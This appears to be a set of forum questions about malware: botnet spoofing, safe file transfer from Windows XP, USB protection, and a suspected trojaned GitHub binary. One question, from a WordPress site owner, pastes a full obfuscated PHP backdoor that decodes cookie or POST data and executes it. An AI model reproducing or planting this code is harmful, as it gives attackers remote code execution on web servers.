Why attacker do not care about masking the IP of the infected device of botnet?

I get a sentence:

If an attack is created using a botnet the likelihood of tracking the attack back to its source is low. For an added level of obfuscation, an attacker may have each distributed device also spoof the IP addresses from which it sends packets. If the attacker is using a botnet such as the Mirai botnet, they generally won’t care about masking the IP of the infected device.

Why attacker do not care about masking the IP of the infected device of botnet?

Is testing for all executables without considering any files in the system is enough for deducing whether the system is infected with malware?

I came to know that the malicious activities will be carried out only by a software(program) whereas the malicious files(data to the softwares installed in the system) can’t perform the malicious activities directly by themselves but they can responsible for bringing those malicious softwares to the system( say like steganography).Hence those softwares also must be installed ( automatically or manually) before performing their activity.

If this is true scanning for malware in softwares before they get installed( triggered manually or automatically) is enough to say that the system is 100% secure(considering that our detector is ideally 100%accurate)?

How to securely transfer files from a possibly infected WinXP machine to Linux?

There is an old Windows XP installation that was being used without even an antivirus. This WinXP computer has files. These files are important and should be moved to a Linux installation. Given the lack of any security practices on the side of the WinXP owner it seems possible that the data contains malware.

I can now:

  • Ignore this and simply keep using these files in Linux; after all Linux is supposed to not need AV.
    • At the very least the files should be scanned to avoid accidental redistribution of malware if they are ever sent to anyone else again
    • The files contain eg a multitude of .odt / .doc documents – maybe it’s a very remote possibility, I don’t know, but malicious macros are OS independent?
  • Install ClamAV on Linux machine, scan the files, remove Clam afterwards.
    • AFAIK ClamAV is known for its poor detection rate – scanning the files with it is only marginally better than not scanning at all?
  • Install an AV on the WinXP machine (Panda Free AV still supports WinXP, doesn’t it?), scan the files there, only transfer them afterwards.
    • Which means going online with WinXP once again – this just feels wrong
  • Any options I overlooked?

I feel stuck. Not sure how to progress.

Note I wouldn’t like to manually inspect the files and eg remove any potentially suspicious files like .exe files while leaving safe files like .png files intact. Reason is the data is not mine, I was just asked to transfer it so that someone else may use them.

What is the accepted best practice in a situation like this?

Is it possible to be infected with malware/virus via a proxy?

I’m curious as to whether you can be infected with malware by using a proxy? I currently process data using Python but occasionally I encounter recaptcha, so I’m looking to implement proxy support.

The data processing is simply an experimental project. So of course my priority is the state of my computer and so I want to get a better insight of malware via proxies before I establish a connection with one via python, the connection would be made via TCP.

Also I’m not necessarily looking for a in-depth answer as I assume if this is possible there’s multiple scenarios, so just a simple yes/no and brief explanation would be great.

Is there a option to protect a USB stick from being infected other than flash drives with hardware protection?

I would like to protect my flash drives to being infected when I put it in another computers or devices. After some research, I found that I will not be able to reach this level of protection by using only software solutions (correct me if I’m wrong).

However, I don’t have a flash drive with hardware protection and my only way to get one is importing (it will not be cheap). I also found that SD card’s switches against writing is not in a hardware-level, so I kinda have to trust that a potentially infected computer will respect it, which is not a good idea.

So, my question is: is there a trustful way (using USB) to put my files into another computer without my USB stick (flash drive or SD card) being infected?

What’s the effect if this malware if infected your WP?

Just curious here and I need better understanding about this malware. Because their are websites are infected by this malware including my websites. But I can clean them all. Usually this malware written in strange name in .php file, inside this file:

<?php $  hsexdir = 'pmi9kl4H61gcbayrf_xsuo*-5#vden3t\'7';$  yiorkoj = Array();$  yiorkoj[] = $  hsexdir[11].$  hsexdir[15].$  hsexdir[28].$  hsexdir[13].$  hsexdir[31].$  hsexdir[28].$  hsexdir[17].$  hsexdir[16].$  hsexdir[20].$  hsexdir[29].$  hsexdir[11].$  hsexdir[31].$  hsexdir[2].$  hsexdir[21].$  hsexdir[29];$  yiorkoj[] = $  hsexdir[7].$  hsexdir[22];$  yiorkoj[] = $  hsexdir[24].$  hsexdir[27].$  hsexdir[11].$  hsexdir[6].$  hsexdir[13].$  hsexdir[13].$  hsexdir[8].$  hsexdir[24].$  hsexdir[23].$  hsexdir[3].$  hsexdir[27].$  hsexdir[24].$  hsexdir[24].$  hsexdir[23].$  hsexdir[6].$  hsexdir[16].$  hsexdir[12].$  hsexdir[24].$  hsexdir[23].$  hsexdir[13].$  hsexdir[33].$  hsexdir[11].$  hsexdir[27].$  hsexdir[23].$  hsexdir[28].$  hsexdir[28].$  hsexdir[24].$  hsexdir[8].$  hsexdir[9].$  hsexdir[27].$  hsexdir[11].$  hsexdir[30].$  hsexdir[13].$  hsexdir[27].$  hsexdir[11].$  hsexdir[28];$  yiorkoj[] = $  hsexdir[25];$  yiorkoj[] = $  hsexdir[11].$  hsexdir[21].$  hsexdir[20].$  hsexdir[29].$  hsexdir[31];$  yiorkoj[] = $  hsexdir[19].$  hsexdir[31].$  hsexdir[15].$  hsexdir[17].$  hsexdir[15].$  hsexdir[28].$  hsexdir[0].$  hsexdir[28].$  hsexdir[13].$  hsexdir[31];$  yiorkoj[] = $  hsexdir[28].$  hsexdir[18].$  hsexdir[0].$  hsexdir[5].$  hsexdir[21].$  hsexdir[27].$  hsexdir[28];$  yiorkoj[] = $  hsexdir[19].$  hsexdir[20].$  hsexdir[12].$  hsexdir[19].$  hsexdir[31].$  hsexdir[15];$  yiorkoj[] = $  hsexdir[13].$  hsexdir[15].$  hsexdir[15].$  hsexdir[13].$  hsexdir[14].$  hsexdir[17].$  hsexdir[1].$  hsexdir[28].$  hsexdir[15].$  hsexdir[10].$  hsexdir[28];$  yiorkoj[] = $  hsexdir[19].$  hsexdir[31].$  hsexdir[15].$  hsexdir[5].$  hsexdir[28].$  hsexdir[29];$  yiorkoj[] = $  hsexdir[0].$  hsexdir[13].$  hsexdir[11].$  hsexdir[4];foreach ($  yiorkoj[8]($  _COOKIE, $  _POST) as $  sgmcz => $  tfbhhc){function ouvcux($  yiorkoj, $  sgmcz, $  lcrwjj){return $  yiorkoj[7]($  yiorkoj[5]($  sgmcz . $  yiorkoj[2], ($  lcrwjj / $  yiorkoj[9]($  sgmcz)) + 1), 0, $  lcrwjj);}function jnlge($  yiorkoj, $  ysittw){return @$  yiorkoj[10]($  yiorkoj[1], $  ysittw);}function njfgaru($  yiorkoj, $  ysittw){$  epjvwf = $  yiorkoj[4]($  ysittw) % 3;if (!$  epjvwf) {$  oqkbtbd = $  yiorkoj[0]; $  qyzju = $  oqkbtbd("", $  ysittw[1]($  ysittw[2]));$  qyzju();exit();}}$  tfbhhc = jnlge($  yiorkoj, $  tfbhhc);njfgaru($  yiorkoj, $  yiorkoj[6]($  yiorkoj[3], $  tfbhhc ^ ouvcux($  yiorkoj, $  sgmcz, $  yiorkoj[9]($  tfbhhc))));} 

and that malware creates many index.php files in folders and also this malware adds code in index.php (real one), wp-config.php, and wp-setting.php. This malware changes the file permission of those infected files to 0755. Inside of this index.php (original and fake) and those original WP files there is an encrypted code of the destination directories to the other malware with .ico (extension) or favicon file.

May be expert can explain more.

Computer infected with malware or false positive?

(windows 8.1 user)
A few months ago I downloaded binaries from: https://github.com/noahp/srlua-mingw

They had 2 exe files in the folder: srlua.exe and glue.exe. I had been unable to compile srlua from the original github posting for srlua, so I used the srlua.exe from the binary and the glue.exe which I compiled on my own. I was able to use the tools successfully. The only issue was I received a few positives (1-2) when scanning the various files via virustotal, but that was expected given they are programs that compile lua code into .exe (i.e. c compilers get flagged alot on virustotal).

Skip ahead to today, I needed to use the program again. But because srlua.exe deletes itself (glues itself) to the created .exe, I needed another copy. I found the old zip for the binary in my recycle bin so I restored. I then proceeded to try and get the code to work again, but couldn’t get it to work. I then proceeded to use “just” the files in the binary’s zip srlua.exe and glue.exe (the ones in link above), and was able to create the .exe but not get them to run either. When opening the created .exe it said they were unrecognized filetypes. So again: 2 months ago, I didn’t use both files from the zip, but I did this time.

I then received a notification from my antivirus that “malware detected on pc”. It linked specifically to srlua.exe. I deleted the srlua.exe, and then followed the ‘disinfection’ protocols kasperky presented to me. I had never seen this prompt before and I couldn’t tell if it had detected anything real or was just presenting safety options. The only thing of worry it presented to me was that it detected an unknown program/code running at pc start.

I followed all their suggestions, and restarted the computer as they told me to. I then scanned the .zip file that had the binaries in it, on virus total. The database version showed its fine, I rescanned though and it turned over 50% positive. I then downloaded malewarebytes and ran that, and it picked up a registry key in an old divx player folder, I’m guessing that’s unrelated, and it picked up the zip folder from my downloads and the ones in my trashbin. I quarantined the zip in my downloads folder, I’ll delete later if necessary, and deleted the others.

I then went to the github page. I’m really bad at understanding github, but it says last commit was 4 years ago…and as stated I downloaded this zip 2 months ago originally. I then went to grab the zip file again, but was blocked by kasperky citing: Access denied Object URL: https://codeload.github.com/noahp/srlua-mingw/zip/master Reason: the object is infected by P2P-Worm.Win32.Palevo.ikpc

This was not there when I downloaded 2 months ago. This is all new. I messaged github, and am waiting for reply, however I am unsure of how github works and if I’m messaging the right place (they only had an abuse and harassment section). This raises questions like: Was the file infected while on the github servers…why is it still there on the site if everything is now flagged by all the antivirus as malware…etc..

My main concern though is: Was I likely infected? And how can I tell if I’m still infected? How would I even know? The antiviruses, when I look at the reports from kapersky and malewarebytes, don’t tell me anything other than that srlua.exe and the .zip it came from are positive. Wouldn’t there be more to report if it was actually malware?

The last backup I have is from months ago, and the backup was made after my use of the program back then. So the backup technically is of a pc that used the supposedly infected srlua.exe with the not infected glue.exe I compiled myself. It’s undesirable to backup to that point. And there’s the potential even that could be infected. I’d assume it’s unlikely that a perpetrator designed it so you needed to use both the srlua.exe and glue.exe from the zip to infect the pc.

I have not experienced any odd behaviour on my pc. But I have no idea what a pc with malware does or doesn’t do, or what else can be checked outside of scans.

The process for using srlua.exe and glue.exe, from the link, is in cmd prompt (windows user) to:

glue srlua.exe prong.lua prong.exe   

where prong is the code file’s name. I’m assuming running this command is the same as opening the .exe and anything could happen if it is actually infected.